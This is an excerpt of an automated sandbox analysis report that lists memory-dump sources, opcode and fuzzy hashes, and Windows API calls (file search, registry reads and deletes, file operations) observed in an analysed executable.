                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                              • Instruction ID: 6855221002494b765214394805571b816b3a2b1c2e31bdc36608bad3b484bcdf
                              • Opcode Fuzzy Hash: da96dc2bbb9a86ab2b5a0042be55c5a39520afa60a4d641acd723a491c183434
                              • Instruction Fuzzy Hash: FEA13271E00229CBDF28CFA8C8446ADBBB1FF44305F15856EE816BB281C7795A96DF44
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                              • Instruction ID: 6c4a77322bd37e7d8c46b95768b691bf5348243e95b36c4706824fec2f4d082d
                              • Opcode Fuzzy Hash: 45b087146125c5b2b0c74364d17b57d2d8ebf1295e4abb7c2da9f37e6e20948f
                              • Instruction Fuzzy Hash: A0911170D00229CBDF28CF98C8587ADBBB1FF44305F15856AE816BB281C7795A96DF84
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
                              • Instruction ID: 723f18ff0051ee6ad4f375e9cb18d989a687bb59657bcd06a5bbc8819a965d11
                              • Opcode Fuzzy Hash: ec7db08be09974c8046cad88b73edbb403e33193446cf3f9fa5a5555e34d97c1
                              • Instruction Fuzzy Hash: F5814371E00229CFDF24CFA8C8847ADBBB1FB44305F25856AD416BB281C7389A96DF44
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
                              • Instruction ID: f9a0fdfb68df0875c036107095c0f8e37124572de3281b7b6a4fcb1f7c3ff658
                              • Opcode Fuzzy Hash: 8c6c0676c47b070245886c612b6dc18845a4ce32cc894a17ea31aa6889f3f80a
                              • Instruction Fuzzy Hash: DF818771D00229DBDF24CFA8D8447AEBBB0FF44305F11856AE856BB280CB785A96DF44
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
                              • Instruction ID: 20aa67b2f9945943e29b5428d9247f38e2249d0fc5fe98f3e4ff2a84f3334865
                              • Opcode Fuzzy Hash: f6ce5af891e87e3449ce1a2b8efcbaa2a3983e7e126d00aa5b1ca20c5284b7a8
                              • Instruction Fuzzy Hash: 17712271E00229DBDF24CFA8C8447ADBBB1FF44305F15846AE856BB280C7395996DF54
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
                              • Instruction ID: 361238ff60de6b05a878e60f6b30513898442098bea6392746699c597b8ff52c
                              • Opcode Fuzzy Hash: 8cda32c1d2df7732f9a33e0b4945691d5d8bf2b32cd6aa3e273add15dd404c12
                              • Instruction Fuzzy Hash: 53713371E00229DBDF28CF98C844BADBBB1FF44305F15846AE816BB280CB795996DF54
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
                              • Instruction ID: cefc1bbef9c73defef891fc114d0afe65c0266ceafdcaf147cd695a7a928f12c
                              • Opcode Fuzzy Hash: 7ce01b185a18f77deed043a820b6804b7b2a700fb218066bf9b3b7a05f4b9fc8
                              • Instruction Fuzzy Hash: E1715671E00229DBDF28CF98C8447ADBBB1FF44305F15846AD816BB281CB795996DF44
                              APIs
                                • Part of subcall function 0040639C: FindFirstFileA.KERNELBASE(75A33410,00422580,C:\,00405B62,C:\,C:\,00000000,C:\,C:\,75A33410,?,75A32EE0,00405881,?,75A33410,75A32EE0), ref: 004063A7
                                • Part of subcall function 0040639C: FindClose.KERNELBASE(00000000), ref: 004063B3
                              • lstrlenA.KERNEL32 ref: 00402285
                              • lstrlenA.KERNEL32(00000000), ref: 0040228F
                              • SHFileOperationA.SHELL32(?,?,?,00000000), ref: 004022B7
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FileFindlstrlen$CloseFirstOperation
                              • String ID:
                              • API String ID: 1486964399-0
                              • Opcode ID: b47fb53b0334603386ac124c2a285910fb3e70b2032b5f5d66ff835e7553619e
                              • Instruction ID: 7601fe6c075200cb0f0395ff2ba46aeb4d837e4f3c96b4285f6c21aa21cd7a5f
                              • Opcode Fuzzy Hash: b47fb53b0334603386ac124c2a285910fb3e70b2032b5f5d66ff835e7553619e
                              • Instruction Fuzzy Hash: F8117C71A14205AACB10EFF98949A9DBAF8AF44304F10403FA405FB2C2D6B8C5418B69
                              APIs
                              • RegEnumKeyA.ADVAPI32(00000000,00000000,?,000003FF), ref: 00402511
                              • RegEnumValueA.ADVAPI32(00000000,00000000,?,?), ref: 00402524
                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskABB0.tmp,00000000,00000011,00000002), ref: 0040253C
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: Enum$CloseValue
                              • String ID:
                              • API String ID: 397863658-0
                              • Opcode ID: 8ae0c4f3e46a3f99f64f669cb9b9086aaa963cdd8b53f875c54c26ea0aedb13f
                              • Instruction ID: 518a01c90e212b4e6c6a91e55dc37795372a660c14e02f5234546a481bba951e
                              • Opcode Fuzzy Hash: 8ae0c4f3e46a3f99f64f669cb9b9086aaa963cdd8b53f875c54c26ea0aedb13f
                              • Instruction Fuzzy Hash: 9901B171A04105AFE7159F69DE9CABF7ABCEF80348F10003EF405A61C0DAB84A419729
                              APIs
                              Memory Dump Source
                              • Source File: 00000005.00000002.96983501688.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                              • Associated: 00000005.00000002.96983452754.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983541203.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                              • Associated: 00000005.00000002.96983601110.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_10000000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: EnumErrorLastWindows
                              • String ID:
                              • API String ID: 14984897-0
                              • Opcode ID: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
                              • Instruction ID: 7088a7f0c219bdfd589eed4d744adbaf06b55c7882bf085a68ef70f7e309f44b
                              • Opcode Fuzzy Hash: 06dad9edf242867fa2d433b3a0ae819eccaab9780a225514c3bf782f990559be
                              • Instruction Fuzzy Hash: 385194BA908215DFF711EF60D9C575937A8EB443E0F21842AEA08E721DDF34A9818B55
                              APIs
                              • SetFilePointer.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,?,?,00402FEA,000000FF,00000000,00000000,0040A130,?), ref: 00403063
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: FilePointer
                              • String ID:
                              • API String ID: 973152223-0
                              • Opcode ID: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
                              • Instruction ID: d45136b7277fa4a4eeb989eab338d16e1e03b20585a5145be81ea7fda6220a17
                              • Opcode Fuzzy Hash: 636c82f294539f8116134b886240b7bf4a9a68a3f80346334f9d5df26d1cb633
                              • Instruction Fuzzy Hash: 6C314F31204259EFDB109F56DD44A9A7FA8EB08759F10803AF905FA190D378DA50DBA9
                              APIs
                              • RegQueryValueExA.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040249D
                              • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nskABB0.tmp,00000000,00000011,00000002), ref: 0040253C
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CloseQueryValue
                              • String ID:
                              • API String ID: 3356406503-0
                              • Opcode ID: 25d9f08b9c25ebc335b8f4a62a016f162dacef69ee2566890a70634c7d5b4c72
                              • Instruction ID: 1b22629e75d9b419b9fa7e371b5212fc4da00fb077cffe61c988f7dc4f8aba71
                              • Opcode Fuzzy Hash: 25d9f08b9c25ebc335b8f4a62a016f162dacef69ee2566890a70634c7d5b4c72
                              • Instruction Fuzzy Hash: 5511E771A05205EEDB15DF64DA8C5BE7BB4EF05348F20403FE446B72C0D6B88A42DB29
                              APIs
                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                              • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: MessageSend
                              • String ID:
                              • API String ID: 3850602802-0
                              • Opcode ID: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                              • Instruction ID: 0b9a08df0e19283e0c47f542131d218e25c17bbe1cc26e2bbd3e30b70dde81e4
                              • Opcode Fuzzy Hash: 9ad871f4f8a3338eb99fe4e61ab0dcd0b50e8b4f7c7093f405d94b725c985010
                              • Instruction Fuzzy Hash: FD01F431B202109BE7194B389D05B6A36A8E710315F51823FF951F65F1D778CC038B4C
                              APIs
                              • RegDeleteValueA.ADVAPI32(00000000,00000000,00000033), ref: 0040239C
                              • RegCloseKey.ADVAPI32(00000000), ref: 004023A5
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: CloseDeleteValue
                              • String ID:
                              • API String ID: 2831762973-0
                              • Opcode ID: f83bd233bd8663726befb315590dbf39ea9cea469545d982e39583f4008de073
                              • Instruction ID: 4734060bda5bcd379add1307bf53be40299433fde06acb7bb12a187abd2f1290
                              • Opcode Fuzzy Hash: f83bd233bd8663726befb315590dbf39ea9cea469545d982e39583f4008de073
                              • Instruction Fuzzy Hash: 6CF09632B04111ABD710AFB89B8EABE76A89B80354F25003FEA05B71C1DAFC4D02476D
                              APIs
                              • ExpandEnvironmentStringsA.KERNELBASE(00000000,?,00000400,00000001), ref: 00401A31
                              • lstrcmpA.KERNEL32(?,?,?,00000400,00000001), ref: 00401A44
                              Memory Dump Source
                              • Source File: 00000005.00000002.96962354502.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000005.00000002.96962311276.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962388863.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962424002.000000000043E000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000005.00000002.96962724840.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_400000_1ppvR5VRT6.jbxd
                              Similarity
                              • API ID: EnvironmentExpandStringslstrcmp
                              • String ID:
                              • API String ID: 1938659011-0
                              • Opcode ID: 2cd2218bbcb3a25affaf13f37e61e3901990f1d8df7fbec2e67afc0c61dec3ca
